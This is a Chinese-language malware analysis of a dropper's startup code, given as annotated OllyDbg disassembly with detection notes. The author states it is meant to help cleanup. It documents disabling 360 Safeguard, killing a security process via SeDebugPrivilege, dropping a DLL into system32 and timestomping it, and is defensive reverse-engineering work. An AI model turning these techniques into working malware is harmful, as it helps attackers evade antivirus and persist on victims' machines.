搞清楚启动部分的工作方式,有助于感染后清除.
启动部分没有使用比较高深的技术,启动后注册一个服务运行.
 
main函数:

; ---------------------------------------------------------------------
; main (author's label) - dropper entry point, OllyDbg listing.
; retn 10 pops 16 bytes of arguments, which fits a 4-argument stdcall
; entry such as WinMain rather than a C main; the label is a convenience.
; Flow as visible here:
;   1. 4014E4          - find 360 Safeguard (360tRaY.eXe) and rename its
;                        antispy.dll to WS2_32.dll
;   2. 4014B4("RsTrAi.eXe") - find a process with that name, terminate it
;   3. build "<system32>\R?m?t?C.dll" with three letters from 401004
;      (by push order: R[a-z] m[b-y] t[c-x] C.dll); 401004 reseeds from
;      GetTickCount on every call, so the letters are only semi-random
;   4. 401044(0, 0x66, "DLL", path) - write resource "DLL"/0x66 of this
;      executable to that path
;   5. LoadLibraryA(path), GetProcAddress("Install"), Install(path)
;   6. 4011C4 (not analysed on this page), return 0
; Stack: 0x208 bytes of locals, esi is the only callee-saved reg used.
;   path buffer  : [esp+C] while the two random values are pushed,
;                  [esp+4] once add esp,28 has run
;   system dir   : [esp+108] / [esp+110] (same buffer, different esp)
; Detection points grounded in this listing: the process-name strings
; "RsTrAi.eXe" and "360tRaY.eXe", a freshly created DLL in system32
; matching R?m?t?C.dll, and LoadLibrary + GetProcAddress("Install")
; immediately after the drop.
; ---------------------------------------------------------------------
00401674 /$ 81EC 08020000 sub esp, 208 ; 0x208 bytes of locals (two MAX_PATH buffers)
0040167A |. 56 push esi
0040167B |. E8 64FEFFFF call 004014E4 ; detect 360 Safeguard and disable it (renames its antispy.dll, see 4014E4)
00401680 |. 68 9C304000 push 0040309C ; ASCII "RsTrAi.eXe"
00401685 |. E8 2AFEFFFF call 004014B4 ; find a process named like RsTrAi.eXe and terminate it (see 4014B4)
0040168A |. 83C4 04 add esp, 4 ; author's note: should this be RSTray.exe? Looks like a typo in the malware. 4013D4 compares with StrStrIA, so case is irrelevant but the spelling is not.
0040168D |. 90 nop ; padding
0040168E |. 90 nop
0040168F |. 90 nop
00401690 |. 90 nop
00401691 |. 90 nop
00401692 |. 8D8424 080100>lea eax, dword ptr [esp+108] ; eax = system-directory buffer
00401699 |. 68 04010000 push 104 ; /BufSize = 104 (260.) = MAX_PATH
0040169E |. 50 push eax ; |Buffer
0040169F |. FF15 8C204000 call dword ptr [40208C] ; \GetSystemDirectoryA
004016A5 |. 6A 78 push 78
004016A7 |. 6A 63 push 63
004016A9 |. E8 56F9FFFF call 00401004 ; value in [0x63,0x78] = 'c'..'x' (see 401004)
004016AE |. 83C4 08 add esp, 8
004016B1 |. 50 push eax ; left on the stack: becomes wsprintfA's last %c
004016B2 |. 6A 79 push 79
004016B4 |. 6A 62 push 62
004016B6 |. E8 49F9FFFF call 00401004 ; value in [0x62,0x79] = 'b'..'y'
004016BB |. 83C4 08 add esp, 8
004016BE |. 50 push eax ; left on the stack: becomes the second %c
004016BF |. 6A 7A push 7A
004016C1 |. 6A 61 push 61
004016C3 |. E8 3CF9FFFF call 00401004 ; value in [0x61,0x7A] = 'a'..'z'
004016C8 |. 83C4 08 add esp, 8
004016CB |. 8D8C24 100100>lea ecx, dword ptr [esp+110] ; |ecx = system directory; target is a semi-random DLL name under system32
004016D2 |. 8D5424 0C lea edx, dword ptr [esp+C] ; |edx = output path buffer
004016D6 |. 50 push eax ; |<%c> first %c ('a'..'z'); the two values pushed earlier fill the 2nd and 3rd %c
004016D7 |. 51 push ecx ; |<%s>
004016D8 |. 68 88304000 push 00403088 ; |Format = "%s\R%cm%ct%cC.dll"
004016DD |. 52 push edx ; |s
004016DE |. FF15 38214000 call dword ptr [402138] ; \wsprintfA -> "<system32>\R?m?t?C.dll"
004016E4 |. 8D4424 1C lea eax, dword ptr [esp+1C] ; eax = that path (same buffer as [esp+C] above; wsprintfA's 4 args are still pushed)
004016E8 |. 50 push eax ; destPath
004016E9 |. 68 84304000 push 00403084 ; ASCII "DLL" - resource type
004016EE |. 6A 66 push 66 ; resource id 0x66
004016F0 |. 6A 00 push 0 ; hModule = NULL, i.e. this executable
004016F2 |. E8 4DF9FFFF call 00401044 ; extract the DLL resource and drop it into the system32 path (see 401044)
004016F7 |. 83C4 28 add esp, 28 ; pops 10 dwords: 4 for 401044, 4 for wsprintfA, 2 leftover random values
004016FA |. 8D4C24 04 lea ecx, dword ptr [esp+4] ; below: load the dropped DLL and run its Install export
004016FE |. 51 push ecx ; /FileName
004016FF |. FF15 88204000 call dword ptr [402088] ; \LoadLibraryA
00401705 |. 8BF0 mov esi, eax ; esi = hModule of the dropped DLL
00401707 |. 85F6 test esi, esi
00401709 |. 74 1E je short 00401729 ; load failed -> skip to cleanup
0040170B |. 68 7C304000 push 0040307C ; /ProcNameOrOrdinal = "Install"
00401710 |. 56 push esi ; |hModule
00401711 |. FF15 84204000 call dword ptr [402084] ; \GetProcAddress
00401717 |. 85C0 test eax, eax
00401719 |. 74 07 je short 00401722 ; no Install export -> just free the library
0040171B |. 8D5424 04 lea edx, dword ptr [esp+4] ; edx = DLL path, passed as Install's only argument
0040171F |. EB 19 jmp short 0040173A
00401721 | 90 nop
00401722 |> 56 push esi ; /hLibModule
00401723 |. FF15 80204000 call dword ptr [402080] ; \FreeLibrary
00401729 |> E8 96FAFFFF call 004011C4 ; not analysed on this page
0040172E |. 33C0 xor eax, eax ; return 0
00401730 |. 5E pop esi
00401731 |. 81C4 08020000 add esp, 208
00401737 |. C2 1000 retn 10 ; pops 16 bytes of args: a 4-argument stdcall entry (WinMain-shaped), not C main
0040173A |> 52 push edx
0040173B |. FFD0 call eax ; Install(path) - the dropped DLL's export; per the author it registers a system service
0040173D \.^ EB E3 jmp short 00401722 ; then FreeLibrary and exit


看一下其中的几个关键函数:

函数4014E4:

; ---------------------------------------------------------------------
; sub_4014E4 - neutralise 360 Safeguard. No arguments, no return value.
; Walks the process list for "360tRaY.eXe" (StrStrIA, case-insensitive),
; snapshots that process's modules, and if the first module's path
; contains "safemon", truncates the path at that word and calls
;   MoveFileExA("<dir>antispy.dll", "<dir>WS2_32.dll", REPLACE_EXISTING)
; The author reads this as disabling 360's anti-spy functionality; the
; effect on the product is not verifiable from this listing.
; Locals, relative to esp just after `push ebx`:
;   +4     PROCESSENTRY32 (dwSize 0x128); szExeFile at +0x24 of it,
;          th32ProcessID at +8 of it
;   +0x230 MODULEENTRY32 (dwSize 0x224); szExePath at +0x120 of it
;   +0x130 260-byte buffer for the new file name (zeroed below)
; The string work from 004015AF on is inlined strlen/strcpy/strcat
; (repne scas / rep movs); OllyDbg's "|" marks span the MoveFileExA
; argument setup.
; Register roles: ebx = process snapshot, esi = StrStrIA then module
; snapshot, ebp = CloseHandle (called indirectly via `call ebp`).
; Handle note: the module snapshot in esi is closed only after
; Module32First succeeds; the je at 00401584 returns without closing it.
; ---------------------------------------------------------------------
004014E3 90 nop ; padding before the function; author: checks whether 360 Safeguard is present
004014E4 /$ 81EC 50040000 sub esp, 450 ; renames 360 Safeguard's antispy.dll to WS2_32.dll; 0x450 bytes of locals
004014EA |. 53 push ebx
004014EB |. 6A 00 push 0 ; /ProcessID = 0
004014ED |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
004014EF |. C74424 0C 280>mov dword ptr [esp+C], 128 ; |PROCESSENTRY32.dwSize = 0x128
004014F7 |. C78424 380200>mov dword ptr [esp+238], 224 ; |MODULEENTRY32.dwSize = 0x224
00401502 |. E8 A9080000 call 00401DB0 ; \CreateToolhelp32Snapshot
00401507 |. 8BD8 mov ebx, eax ; ebx = process snapshot
00401509 |. 85DB test ebx, ebx
0040150B |. 0F84 55010000 je 00401666 ; snapshot failed -> return
00401511 |. 55 push ebp
00401512 |. 8D4424 08 lea eax, dword ptr [esp+8] ; eax = &PROCESSENTRY32
00401516 |. 56 push esi
00401517 |. 50 push eax ; /lppe
00401518 |. 53 push ebx ; |hSnapshot
00401519 |. E8 8C080000 call 00401DAA ; \Process32First
0040151E |. 8B2D B8204000 mov ebp, dword ptr [4020B8] ; kernel32.CloseHandle, used via `call ebp` below
00401524 |. 85C0 test eax, eax
00401526 |. 0F84 35010000 je 00401661 ; no entries -> close snapshot and return
0040152C |. 8B35 30214000 mov esi, dword ptr [402130] ; SHLWAPI.StrStrIA (case-insensitive substring search)
00401532 |> 8D4C24 30 /lea ecx, dword ptr [esp+30] ; ecx = pe.szExeFile; loop: look for a 360Tray.exe process, jump to 40155E when found
00401536 |. 68 70304000 |push 00403070 ; ASCII "360tRaY.eXe"
0040153B |. 51 |push ecx
0040153C |. FFD6 |call esi ; StrStrIA(pe.szExeFile, "360tRaY.eXe")
0040153E |. 85C0 |test eax, eax
00401540 |. 75 1C |jnz short 0040155E ; match
00401542 |. 8D5424 0C |lea edx, dword ptr [esp+C]
00401546 |. 52 |push edx ; /lppe
00401547 |. 53 |push ebx ; |hSnapshot
00401548 |. E8 57080000 |call 00401DA4 ; \Process32Next
0040154D |. 85C0 |test eax, eax
0040154F |.^ 75 E1 \jnz short 00401532
00401551 |. 53 push ebx ; not found: CloseHandle(process snapshot) and return
00401552 |. FFD5 call ebp
00401554 |. 5E pop esi
00401555 |. 5D pop ebp
00401556 |. 5B pop ebx
00401557 |. 81C4 50040000 add esp, 450
0040155D |. C3 retn
0040155E |> 8B4424 14 mov eax, dword ptr [esp+14] ; eax = pe.th32ProcessID of the matched process
00401562 |. 50 push eax ; /ProcessID
00401563 |. 6A 08 push 8 ; |Flags = TH32CS_SNAPMODULE
00401565 |. E8 46080000 call 00401DB0 ; \CreateToolhelp32Snapshot
0040156A |. 8BF0 mov esi, eax ; esi = module snapshot
0040156C |. 85F6 test esi, esi
0040156E |. 0F84 ED000000 je 00401661
00401574 |. 8D8C24 380200>lea ecx, dword ptr [esp+238] ; ecx = &MODULEENTRY32; the first module gives the exe path
0040157B |. 51 push ecx ; /pModuleentry
0040157C |. 56 push esi ; |hSnapshot
0040157D |. E8 34080000 call 00401DB6 ; \Module32First
00401582 |. 85C0 test eax, eax
00401584 |. 0F84 D7000000 je 00401661 ; (module snapshot esi is not closed on this path)
0040158A |. 56 push esi ; CloseHandle(module snapshot)
0040158B |. FFD5 call ebp
0040158D |. 8D9424 580300>lea edx, dword ptr [esp+358] ; edx = me.szExePath; if it contains "safemon" the process is taken to be 360's
00401594 |. 68 68304000 push 00403068 ; /s2 = "safemon"
00401599 |. 52 push edx ; |s1
0040159A |. FF15 E8204000 call dword ptr [4020E8] ; \strstr
004015A0 |. 83C4 08 add esp, 8
004015A3 |. 85C0 test eax, eax
004015A5 |. 0F84 B6000000 je 00401661 ; not 360 -> close process snapshot and return
004015AB |. 57 push edi
004015AC |. C600 00 mov byte ptr [eax], 0 ; truncate szExePath at "safemon": it now holds the directory prefix
004015AF |. B9 41000000 mov ecx, 41 ; zero 0x41 dwords (260 bytes) = new-name buffer
004015B4 |. 33C0 xor eax, eax
004015B6 |. 8DBC24 380100>lea edi, dword ptr [esp+138]
004015BD |. 8D9424 380100>lea edx, dword ptr [esp+138] ; edx = new-name buffer
004015C4 |. F3:AB rep stos dword ptr es:[edi]
004015C6 |. 83C9 FF or ecx, FFFFFFFF ; inlined strlen of the truncated path
004015C9 |. 8DBC24 5C0300>lea edi, dword ptr [esp+35C]
004015D0 |. F2:AE repne scas byte ptr es:[edi]
004015D2 |. F7D1 not ecx ; ecx = length + 1 (includes the NUL)
004015D4 |. 2BF9 sub edi, ecx ; edi = start of the truncated path; the rename is assembled below
004015D6 |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING
004015D8 |. 8BC1 mov eax, ecx ; |save length for the byte tail
004015DA |. 8BF7 mov esi, edi ; |strcpy(newname, dir): esi = src
004015DC |. C1E9 02 shr ecx, 2 ; |
004015DF |. 8BFA mov edi, edx ; |edi = dst
004015E1 |. 8D9424 3C0100>lea edx, dword ptr [esp+13C] ; |edx = newname (same buffer, esp moved by push)
004015E8 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |dword part of the copy
004015EA |. 8BC8 mov ecx, eax ; |
004015EC |. 33C0 xor eax, eax ; |
004015EE |. 83E1 03 and ecx, 3 ; |
004015F1 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |remaining 0-3 bytes
004015F3 |. BF 5C304000 mov edi, 0040305C ; |ASCII "WS2_32.dll" - strcat(newname, "WS2_32.dll") follows
004015F8 |. 83C9 FF or ecx, FFFFFFFF ; |
004015FB |. F2:AE repne scas byte ptr es:[edi] ; |strlen("WS2_32.dll")
004015FD |. F7D1 not ecx ; |
004015FF |. 2BF9 sub edi, ecx ; |
00401601 |. 8BF7 mov esi, edi ; |esi = "WS2_32.dll"
00401603 |. 8BFA mov edi, edx ; |edi = newname
00401605 |. 8BD1 mov edx, ecx ; |edx = source length + 1
00401607 |. 83C9 FF or ecx, FFFFFFFF ; |
0040160A |. F2:AE repne scas byte ptr es:[edi] ; |find newname's terminating NUL
0040160C |. 8BCA mov ecx, edx ; |
0040160E |. 4F dec edi ; |edi = position of that NUL
0040160F |. C1E9 02 shr ecx, 2 ; |
00401612 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |append
00401614 |. 8BCA mov ecx, edx ; |
00401616 |. 8D9424 600300>lea edx, dword ptr [esp+360] ; |edx = truncated szExePath ("<dir>")
0040161D |. 83E1 03 and ecx, 3 ; |
00401620 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |
00401622 |. BF 50304000 mov edi, 00403050 ; |ASCII "antispy.dll" - strcat(dir, "antispy.dll") follows
00401627 |. 83C9 FF or ecx, FFFFFFFF ; |
0040162A |. F2:AE repne scas byte ptr es:[edi] ; |
0040162C |. F7D1 not ecx ; |
0040162E |. 2BF9 sub edi, ecx ; |
00401630 |. 8BF7 mov esi, edi ; |esi = "antispy.dll"
00401632 |. 8BFA mov edi, edx ; |edi = dir
00401634 |. 8BD1 mov edx, ecx ; |
00401636 |. 83C9 FF or ecx, FFFFFFFF ; |
00401639 |. F2:AE repne scas byte ptr es:[edi] ; |
0040163B |. 8BCA mov ecx, edx ; |
0040163D |. 4F dec edi ; |
0040163E |. C1E9 02 shr ecx, 2 ; |
00401641 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |
00401643 |. 8BCA mov ecx, edx ; |
00401645 |. 8D8424 3C0100>lea eax, dword ptr [esp+13C] ; |eax = "<dir>WS2_32.dll"
0040164C |. 83E1 03 and ecx, 3 ; |
0040164F |. 50 push eax ; |NewName = "<dir>WS2_32.dll"
00401650 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |
00401652 |. 8D8C24 640300>lea ecx, dword ptr [esp+364] ; |ecx = "<dir>antispy.dll"
00401659 |. 51 push ecx ; |ExistingName = "<dir>antispy.dll"
0040165A |. FF15 78204000 call dword ptr [402078] ; \MoveFileExA (return value not checked)
00401660 |. 5F pop edi
00401661 |> 53 push ebx ; CloseHandle(process snapshot)
00401662 |. FFD5 call ebp
00401664 |. 5E pop esi
00401665 |. 5D pop ebp
00401666 |> 5B pop ebx
00401667 |. 81C4 50040000 add esp, 450
0040166D \. C3 retn


函数4014B4:

; ---------------------------------------------------------------------
; sub_4014B4(const char *name) - cdecl.
; Looks for a running process whose image name contains `name` (4013D4)
; and, if one is found, terminates it (401464).
; Returns 401464's result when a process was found, 0 otherwise.
; ---------------------------------------------------------------------
004014B4 /$ 8B4424 04 mov eax, dword ptr [esp+4] ; eax = name
004014B8 |. 56 push esi
004014B9 |. 50 push eax
004014BA |. 33F6 xor esi, esi ; esi = 0, the "not found" return value
004014BC |. E8 13FFFFFF call 004013D4 ; PID of a process whose name contains `name`, or 0 (see 4013D4)
004014C1 |. 83C4 04 add esp, 4
004014C4 |. 85C0 test eax, eax
004014C6 |. 74 0B je short 004014D3 ; not running
004014C8 |. 50 push eax
004014C9 |. E8 96FFFFFF call 00401464 ; terminate that PID (see 401464)
004014CE |. 83C4 04 add esp, 4
004014D1 |. 5E pop esi
004014D2 |. C3 retn ; eax = 401464's result
004014D3 |> 8BC6 mov eax, esi ; return 0
004014D5 |. 5E pop esi
004014D6 \. C3 retn
------------
; ---------------------------------------------------------------------
; sub_4013D4(const char *name) - cdecl.
; Returns the th32ProcessID of the first process whose szExeFile contains
; `name` (StrStrIA, case-insensitive), or 0 when none matches.
; PROCESSENTRY32 lives at [esp+10] once the four pushes are done
; (dwSize 0x128); szExeFile is at +0x24 and th32ProcessID at +8 of it.
; Register roles: esi = snapshot handle, edi = name, ebx = StrStrIA,
; ebp = result (0 until a match is found).
; Note: the snapshot handle is passed to Process32First without being
; checked against INVALID_HANDLE_VALUE; presumably Process32First just
; fails in that case and 0 is returned.
; The two epilogues (00401429 and 00401441) are identical; the compiler
; duplicated the exit path.
; ---------------------------------------------------------------------
004013D4 /$ 81EC 28010000 sub esp, 128 ; is a process with this name running? 0x128 bytes of locals
004013DA |. 53 push ebx
004013DB |. 55 push ebp
004013DC |. 56 push esi
004013DD |. 33ED xor ebp, ebp ; ebp = 0 (result)
004013DF |. 57 push edi
004013E0 |. 55 push ebp ; /ProcessID => 0
004013E1 |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
004013E3 |. E8 C8090000 call 00401DB0 ; \CreateToolhelp32Snapshot
004013E8 |. 8BF0 mov esi, eax ; esi = snapshot (not validated)
004013EA |. 8D4424 10 lea eax, dword ptr [esp+10] ; eax = &PROCESSENTRY32
004013EE |. 50 push eax ; /lppe
004013EF |. 56 push esi ; |hSnapshot
004013F0 |. C74424 18 280>mov dword ptr [esp+18], 128 ; |pe.dwSize = 0x128
004013F8 |. E8 AD090000 call 00401DAA ; \Process32First
004013FD |. 85C0 test eax, eax
004013FF |. 74 40 je short 00401441 ; nothing to walk -> return 0
00401401 |. 8BBC24 3C0100>mov edi, dword ptr [esp+13C] ; edi = name (first argument)
00401408 |. 8B1D 30214000 mov ebx, dword ptr [402130] ; SHLWAPI.StrStrIA
0040140E |> 8D4C24 34 /lea ecx, dword ptr [esp+34] ; ecx = pe.szExeFile
00401412 |. 57 |push edi
00401413 |. 51 |push ecx
00401414 |. FFD3 |call ebx ; StrStrIA(pe.szExeFile, name)
00401416 |. 85C0 |test eax, eax
00401418 |. 75 23 |jnz short 0040143D ; match
0040141A |. 8D5424 10 |lea edx, dword ptr [esp+10]
0040141E |. 52 |push edx ; /lppe
0040141F |. 56 |push esi ; |hSnapshot
00401420 |. E8 7F090000 |call 00401DA4 ; \Process32Next
00401425 |. 85C0 |test eax, eax
00401427 |.^ 75 E5 \jnz short 0040140E
00401429 |. 56 push esi ; /hObject - no match: close and return 0
0040142A |. FF15 B8204000 call dword ptr [4020B8] ; \CloseHandle
00401430 |. 5F pop edi
00401431 |. 8BC5 mov eax, ebp ; eax = 0
00401433 |. 5E pop esi
00401434 |. 5D pop ebp
00401435 |. 5B pop ebx
00401436 |. 81C4 28010000 add esp, 128
0040143C |. C3 retn
0040143D |> 8B6C24 18 mov ebp, dword ptr [esp+18] ; ebp = pe.th32ProcessID of the match
00401441 |> 56 push esi ; /hObject
00401442 |. FF15 B8204000 call dword ptr [4020B8] ; \CloseHandle
00401448 |. 5F pop edi
00401449 |. 8BC5 mov eax, ebp ; eax = PID (or 0 from the Process32First-failed path)
0040144B |. 5E pop esi
0040144C |. 5D pop ebp
0040144D |. 5B pop ebx
0040144E |. 81C4 28010000 add esp, 128
00401454 \. C3 retn

------------------
; ---------------------------------------------------------------------
; sub_401464(DWORD pid) - cdecl. Terminate the process `pid`.
; First calls 401324("SeDebugPrivilege", 1) - the author describes this
; as raising the process's privilege; presumably it enables
; SeDebugPrivilege on the current token so processes of other users can
; be opened (401324 is not shown on this page). Then
; OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid) -> TerminateProcess(h, 0)
; -> CloseHandle(h).
; Returns TerminateProcess's BOOL; returns 0 (eax left from the failed
; OpenProcess) when the process cannot be opened.
; Detection note: SeDebugPrivilege enablement followed by
; OpenProcess/TerminateProcess against a security product's process is
; the classic AV-killer sequence; the target names are the strings passed
; by the caller (here "RsTrAi.eXe").
; ---------------------------------------------------------------------
00401464 /$ 56 push esi ; terminate the target process
00401465 |. 6A 01 push 1
00401467 |. 68 3C304000 push 0040303C ; ASCII "SeDebugPrivilege"
0040146C |. E8 B3FEFFFF call 00401324 ; raise privilege (author's description; body not on this page)
00401471 |. 8B4424 10 mov eax, dword ptr [esp+10] ; eax = pid (first argument)
00401475 |. 83C4 08 add esp, 8
00401478 |. 50 push eax ; /ProcessId
00401479 |. 6A 00 push 0 ; |Inheritable = FALSE
0040147B |. 68 FF0F1F00 push 1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401480 |. FF15 74204000 call dword ptr [402074] ; \OpenProcess
00401486 |. 8BF0 mov esi, eax ; esi = process handle
00401488 |. 85F6 test esi, esi
0040148A |. 75 02 jnz short 0040148E
0040148C |. 5E pop esi ; open failed: return with eax = 0
0040148D |. C3 retn
0040148E |> 57 push edi
0040148F |. 6A 00 push 0 ; /ExitCode = 0
00401491 |. 56 push esi ; |hProcess
00401492 |. FF15 70204000 call dword ptr [402070] ; \TerminateProcess
00401498 |. 56 push esi ; /hObject
00401499 |. 8BF8 mov edi, eax ; |edi = TerminateProcess result, preserved across CloseHandle
0040149B |. FF15 B8204000 call dword ptr [4020B8] ; \CloseHandle
004014A1 |. 8BC7 mov eax, edi ; return TerminateProcess's result
004014A3 |. 5F pop edi
004014A4 |. 5E pop esi
004014A5 \. C3 retn


函数401004:

; ---------------------------------------------------------------------
; sub_401004(int lo, int hi) - cdecl. Pseudo-random integer in [lo, hi].
; Returns lo when lo == hi. Otherwise:
;   srand(GetTickCount()); return (rand() + 3) % (hi - lo + 1) + lo;
; Because it reseeds from the tick counter on every call, calls made
; within the same tick return the same value, so the three letters main
; requests back to back are likely to repeat more often than chance
; (inferred from the reseeding; not confirmed on a live sample).
; Register roles: edi = lo, esi = hi, then hi - lo + 1 as the divisor;
; cdq sign-extends eax into edx before idiv.
; ---------------------------------------------------------------------
00401004 /$ 56 push esi ; random value within a range
00401005 |. 8B7424 0C mov esi, dword ptr [esp+C] ; esi = hi (second argument)
00401009 |. 57 push edi
0040100A |. 8B7C24 0C mov edi, dword ptr [esp+C] ; edi = lo (first argument)
0040100E |. 3BFE cmp edi, esi
00401010 |. 75 05 jnz short 00401017
00401012 |. 8BC7 mov eax, edi ; lo == hi: return lo
00401014 |. 5F pop edi
00401015 |. 5E pop esi
00401016 |. C3 retn
00401017 |> FF15 D0204000 call dword ptr [4020D0] ; [GetTickCount
0040101D |. 50 push eax ; /seed
0040101E |. FF15 E4204000 call dword ptr [4020E4] ; \srand - reseeded on every call
00401024 |. 83C4 04 add esp, 4
00401027 |. FF15 E0204000 call dword ptr [4020E0] ; [rand
0040102D |. 83C0 03 add eax, 3 ; eax = rand() + 3
00401030 |. 2BF7 sub esi, edi ; esi = hi - lo
00401032 |. 99 cdq ; edx:eax = sign-extended dividend
00401033 |. 46 inc esi ; esi = hi - lo + 1
00401034 |. F7FE idiv esi
00401036 |. 8BC2 mov eax, edx ; remainder
00401038 |. 03C7 add eax, edi ; + lo
0040103A |. 5F pop edi
0040103B |. 5E pop esi
0040103C \. C3 retn


函数00401044:

; ---------------------------------------------------------------------
; sub_401044(HMODULE hModule, int resId, const char *resType,
;            const char *destPath) - cdecl. Drop an embedded resource.
; Returns 1 on success; returns 0 (the failing API's eax) when
; FindResourceA, LoadResource or CreateFileA fail.
; Steps visible here:
;   1. tmp = "<GetTempPathA>\<GetTickCount>_res.tmp"
;   2. FindResourceA(hModule, MAKEINTRESOURCE(resId & 0xFFFF), resType)
;      and LoadResource
;   3. CreateFileA(tmp, GENERIC_WRITE, FILE_SHARE_WRITE, CREATE_ALWAYS)
;   4. a SYSTEMTIME is filled in place: wYear 0x7D4 (2004), wMonth 8,
;      wDay 0x11 (17), wHour 0x14 (20), the other fields 0, i.e.
;      2004-08-17 20:00:00 local; converted with SystemTimeToFileTime and
;      LocalFileTimeToFileTime and applied with SetFileTime to both the
;      creation and last-write time. This timestomps the dropped file so
;      it does not stand out as newly created.
;   5. WriteFile(h, resource bytes, SizeofResource(NULL, hRes)),
;      CloseHandle, FreeResource
;   6. MoveFileA(tmp, destPath); SetFileAttributesA(destPath, 0);
;      DeleteFileA(tmp)
; Arguments: after `sub esp,22C` and the three pushes they sit at
; esp+0x238 (hModule), +0x23C (resId), +0x240 (resType), +0x244
; (destPath); the listing reads the first three at +0x24C/+0x250/+0x254
; while wsprintfA's four pushes are still on the stack, and destPath at
; +0x248 at 00401188 (after the three pushes only).
; Locals (esp after the three pushes): tmp path at +0x30, SYSTEMTIME at
; +0xC, FILETIMEs at +0x1C and +0x24, bytes-written at +0x2C, temp dir
; at +0x134.
; Note: the results of WriteFile, MoveFileA and SetFileAttributesA are
; not checked; the function returns 1 regardless.
; ---------------------------------------------------------------------
00401044 /$ 81EC 2C020000 sub esp, 22C ; find a named resource in the given module
0040104A |. 8D8424 280100>lea eax, dword ptr [esp+128] ; write it to <temp>\<TickCount>_res.tmp ...
00401051 |. 53 push ebx ; ... then move the .tmp to destPath (main passes <system32>\<name>.dll)
00401052 |. 56 push esi
00401053 |. 57 push edi
00401054 |. 50 push eax ; /Buffer
00401055 |. 68 04010000 push 104 ; |BufSize = 104 (260.)
0040105A |. FF15 38204000 call dword ptr [402038] ; \GetTempPathA
00401060 |. FF15 D0204000 call dword ptr [4020D0] ; [GetTickCount
00401066 |. 8D8C24 340100>lea ecx, dword ptr [esp+134] ; ecx = temp directory
0040106D |. 50 push eax ; /<%d> = tick count
0040106E |. 51 push ecx ; |<%s>
0040106F |. 8D5424 38 lea edx, dword ptr [esp+38] ; |edx = tmp path buffer
00401073 |. 68 10304000 push 00403010 ; |Format = "%s\%d_res.tmp"
00401078 |. 52 push edx ; |s
00401079 |. FF15 38214000 call dword ptr [402138] ; \wsprintfA
0040107F |. 8B8C24 500200>mov ecx, dword ptr [esp+250] ; ecx = resId
00401086 |. 8B8424 540200>mov eax, dword ptr [esp+254] ; eax = resType
0040108D |. 8BB424 4C0200>mov esi, dword ptr [esp+24C] ; esi = hModule
00401094 |. 83C4 10 add esp, 10
00401097 |. 81E1 FFFF0000 and ecx, 0FFFF ; MAKEINTRESOURCE(resId); main passes id 0x66 of type "DLL"
0040109D |. 50 push eax ; /ResourceType
0040109E |. 51 push ecx ; |ResourceName
0040109F |. 56 push esi ; |hModule
004010A0 |. FF15 34204000 call dword ptr [402034] ; \FindResourceA
004010A6 |. 8BD8 mov ebx, eax ; ebx = hResource
004010A8 |. 85DB test ebx, ebx
004010AA |. 75 0A jnz short 004010B6
004010AC |. 5F pop edi ; not found: return 0
004010AD |. 5E pop esi
004010AE |. 5B pop ebx
004010AF |. 81C4 2C020000 add esp, 22C
004010B5 |. C3 retn
004010B6 |> 53 push ebx ; /hResource
004010B7 |. 56 push esi ; |hModule
004010B8 |. FF15 30204000 call dword ptr [402030] ; \LoadResource
004010BE |. 8BF8 mov edi, eax ; edi = resource data pointer
004010C0 |. 85FF test edi, edi
004010C2 |. 75 0A jnz short 004010CE
004010C4 |. 5F pop edi ; load failed: return 0
004010C5 |. 5E pop esi
004010C6 |. 5B pop ebx
004010C7 |. 81C4 2C020000 add esp, 22C
004010CD |. C3 retn
004010CE |> 6A 00 push 0 ; /hTemplateFile = NULL
004010D0 |. 68 80000000 push 80 ; |Attributes = NORMAL
004010D5 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
004010D7 |. 6A 00 push 0 ; |pSecurity = NULL
004010D9 |. 6A 02 push 2 ; |ShareMode = FILE_SHARE_WRITE
004010DB |. 8D5424 44 lea edx, dword ptr [esp+44] ; |edx = tmp path
004010DF |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
004010E4 |. 52 push edx ; |FileName
004010E5 |. FF15 2C204000 call dword ptr [40202C] ; \CreateFileA
004010EB |. 8BF0 mov esi, eax ; esi = file handle
004010ED |. 85F6 test esi, esi
004010EF |. 75 0A jnz short 004010FB
004010F1 |. 5F pop edi ; create failed: return 0 (note: tests for 0, not INVALID_HANDLE_VALUE)
004010F2 |. 5E pop esi
004010F3 |. 5B pop ebx
004010F4 |. 81C4 2C020000 add esp, 22C
004010FA |. C3 retn
004010FB |> 33C0 xor eax, eax ; build the fake SYSTEMTIME at [esp+C]
004010FD |. 8D4C24 24 lea ecx, dword ptr [esp+24] ; ecx = FILETIME #1
00401101 |. 894424 0C mov dword ptr [esp+C], eax
00401105 |. 8D5424 0C lea edx, dword ptr [esp+C] ; edx = &SYSTEMTIME
00401109 |. 894424 10 mov dword ptr [esp+10], eax
0040110D |. 51 push ecx ; /pFileTime
0040110E |. 894424 18 mov dword ptr [esp+18], eax ; |
00401112 |. 52 push edx ; |pSystemTime
00401113 |. 894424 20 mov dword ptr [esp+20], eax ; |
00401117 |. 66:C74424 14 >mov word ptr [esp+14], 7D4 ; |wYear = 2004
0040111E |. 66:C74424 16 >mov word ptr [esp+16], 8 ; |wMonth = 8
00401125 |. 66:C74424 1A >mov word ptr [esp+1A], 11 ; |wDay = 17
0040112C |. 66:C74424 1C >mov word ptr [esp+1C], 14 ; |wHour = 20
00401133 |. 66:894424 1E mov word ptr [esp+1E], ax ; |wMinute = 0
00401138 |. FF15 28204000 call dword ptr [402028] ; \SystemTimeToFileTime
0040113E |. 8D4424 1C lea eax, dword ptr [esp+1C] ; eax = FILETIME #2 (output)
00401142 |. 8D4C24 24 lea ecx, dword ptr [esp+24] ; ecx = FILETIME #1 (local time)
00401146 |. 50 push eax ; /pFileTime
00401147 |. 51 push ecx ; |pLocalTime
00401148 |. FF15 24204000 call dword ptr [402024] ; \LocalFileTimeToFileTime
0040114E |. 8D5424 1C lea edx, dword ptr [esp+1C] ; same FILETIME used for both timestamps
